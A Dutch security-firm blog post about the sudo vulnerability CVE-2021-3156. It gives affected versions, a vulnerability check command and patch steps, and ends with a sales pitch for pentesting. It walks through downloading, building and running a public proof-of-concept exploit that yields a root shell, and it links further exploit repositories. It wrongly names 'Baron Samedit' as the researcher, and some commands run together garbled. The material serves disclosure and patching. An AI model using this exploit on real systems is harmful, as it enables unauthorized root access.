Geschreven door: Martijn Kamminga

Redhat en andere linux-distributies hebben dringend veiligheidspatches uitgebracht en gebruikers wordt aangeraden om zo snel mogelijk te upgraden:

Een kwetsbaarheid is ontdekt door The Qualys Research Team, welke al 10 jaar oud is. De Security Researcher, genaamd Baron Samedit, kwam dit op het spoor en heeft daar een exploit voor geschreven. Sudo is een manier binnen Linux om een standaard gebruiker Root rechten te geven op het systeem. Doordat deze kwetsbaarheid misbruikt kan worden door code uit te voeren die je Root rechten geeft, kunnen zowel kwetsbare systemen, maar ook insider-threats een bedreiging voor uw organisatie betekenen. Hieronder volgt een beschrijving hoe u kunt controleren of uw systemen kwetsbaar zijn, laten we de exploit zien en geven wij informatie over onze penetratietesten en webapplicatie scans.

De kwetsbare systemen

CentOS-systeemgebruikers: (niet getest)

1) CentOS 6: Fe standaard sudo wordt beïnvloed en is officieel gestopt met updaten.

2) CentOS 7: upgrade naar 
– sudo-1.8.23-10.el7_9.1 of hoger; 

3) CentOS 8: upgrade naar 
– sudo-1.8.29-6.el8_3.1 of hoger. 

Gebruikers van het Ubuntu-systeem: (Geteste versies: Debian 10, Ubuntu 18.04 en 20.04)

1) Gebruikers van Ubuntu 20.04 LTS-versie wordt aanbevolen om te upgraden naar de volgende versies: 
– sudo-1.8.31-1ubuntu1.2 
– sudo-ldap-1.8.31-1ubuntu1.2 

2) Gebruikers van Ubuntu 18.04 LTS-versie wordt aanbevolen om te upgraden naar de volgende versie: 
– sudo-1.8.21p2-3ubuntu1.4 
– sudo-ldap-1.8.21p2-3ubuntu1.4 

3) Gebruikers van Ubuntu 16.04 LTS-versie wordt aanbevolen om te upgraden naar de volgende versie: 
– sudo-1.8.16-0ubuntu1.10 
– sudo-ldap-1.8.16-0ubuntu1.10 

Gebruikers van het RedHat en andere Linux systemen:

1) Redhat en andere Linux-distributies hebben patches uitgebracht en gebruikers wordt aangeraden om zo snel mogelijk te upgraden:

Het wordt aanbevolen om een ​​back-up van uw gegevens te maken en een snapshot van uw machine voordat u een upgrade uitvoert om problemen te voorkomen. Verantwoordelijkheid is op eigen risico. 

Controleren of u een kwetsbare versie heeft

Test of jouw versie kwetsbaar is
sudoedit -s '\' `perl -e 'print "A" x 65536’`
De volgende output zegt dat je NIET kwetsbaar bent
usage: sudoedit [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-T timeout] [-u user] file ...
De volgende output zegt dat je WEL kwetsbaar bent


(Deze zijn op eigen risico. Als je niet weet wat je doet, voer het dan niet uit):

Maak altijd een Backup / Snapshot van je Systeem alvorens je wijzigingen aanbrengt.

Patching: 
wget https://www.sudo.ws/dist/sudo-1.9.5p2.tar.gz
tar -xvf ./sudo-1.9.5p2.tar.gz
./configure
make && sudo make install
OF voor Ubuntu
sudo apt-get update
sudo apt-get --only-upgrade install sudo


Reproductie Stappen 

Ik installeer een Ubuntu 20.04 systeem

Ik log in en voer uit: 
sudo -i

Ik geef mijn wachtwoord op en reset deze zodat deze niet meer overeenkomt met mijn ‘normale user’ martijn. Ik verwijder ik mijzelf van de sudo groep via de root console.
sudo deluser martijn sudo

Herstart het systeem.

En wanneer ik de volgende commando’s uitvoer:
sudo -i
sudo su

moet je om een wachtwoord verzoeken en aangeven dat je niet in de sudoers groep zit.

Hoe kom ik dan toch bij mijn root user? Via:
su root 
Met het daarbij behorende ww.
Voor Remote Beheer
apt install net-tools
apt install openssh-server
Overige benodigde installaties installeren als root
apt install make
apt install gcc


De Exploit: User rechten verhogen naar root rechten:

CVE-2021-3156 Heap-Based Buffer Overflow in Sudo
cd /tmp
wget https://haxx.in/CVE-2021-3156_nss_poc_ubuntu.tar.gz
tar -xvf CVE-2021-3156_nss_poc_ubuntu.tar.gzcd CVE-2021-3156/makels./sudo-hax-me-a-sandwich
Selecteer je Linux Versie door het command zonder argumenten uit te voeren
Waarbij genoteerd dat Ubuntu versie 18.04 en 20.04 dezelfde is.
Dus deze kan ook tegen een Ubuntu 18.04 uitgevoerd worden met argument 0.
** CVE-2021-3156 PoC by blasty <peter@haxx.in>
  usage: ./sudo-hax-me-a-sandwich <target>

Bij het uitvoeren van uname -a krijgen wij de volgende versie
uname -a
Linux networking4all 5.4.0-26-generic #30-Ubuntu SMP Mon Apr
20 16:58:30 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

cat /etc/os-release
NAME="Ubuntu"VERSION="20.04 LTS (Focal Fossa)"ID=
ubuntuID_LIKE=debianPRETTY_NAME="Ubuntu 20.04 LTS"VERSION_ID=
"20.04"HOME_URL="https://www.ubuntu.com/"SUPPORT_URL=
"https://help.ubuntu.com/"BUG_REPORT_URL="
https://bugs.launchpad.net/ubuntu/"PRIVACY_POLICY_URL=
"https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"VERSION_CODENAME=focalUBUNTU_CODENAME=focal

./sudo-hax-me-a-sandwich 0

** CVE-2021-3156 PoC by blasty <peter@haxx.in>
using target: 'Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31'**
pray for your rootshell.. **[+] bl1ng bl1ng! We got it!
# iduid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),120(lpadmin),
131(lxd),132(sambashare),1000(martijn)

Overige exploits (Niet getest)

Red Hat en/of CentOS?

https://github.com/yaunsky/cve-2021-3156
https://github.com/reverse-ex/CVE-2021-3156

Op maat advies middels onze Penetratie Testen:

Networking4all is een gespecialiseerd Cybersecurity bedrijf welke pentesting opdrachten verzorgt. Neem contact met ons op om te praten over een Black, Grey of Whitebox penetratietest om uw omgevingen veiliger te maken. Wij brengen hier een professioneel advies en rapportage over uit. 

Wat zijn deze verschillende type pentesten vraagt u zich af?

  • Black box (zonder enige voorkennis)
  • Grey box (met informatie zoals een IP en/of credentials)
  • White box (source code review met daarnaast alle kennis over uw systemen / applicaties)

Tevens verzorgen wij webapplicatie scans om uw omgeving te scannen op kwetsbaarheden, comments in de code die mogelijk informatie prijsgeven, ongebruikelijke folders en eventuele backups die op uw website te benaderen zijn, SQL Injectie en nog veel meer volgens de OWASP methode. Wij hebben de specialisten in huis. Kunnen wij u helpen?

Stuur een e-mail naar sales@networking4all.com 

Of bel ons op: +31 (0)20 788 10 30 

U kunt altijd vrijblijvend een offerte opvragen waarbij u uw wensen uiteraard kan aangeven.

Wist u dat wij meer diensten verzorgen? Kijk daarvoor op onze bedrijfspagina: 

https://www.networking4all.com/nl/security-services

Deel artikel via: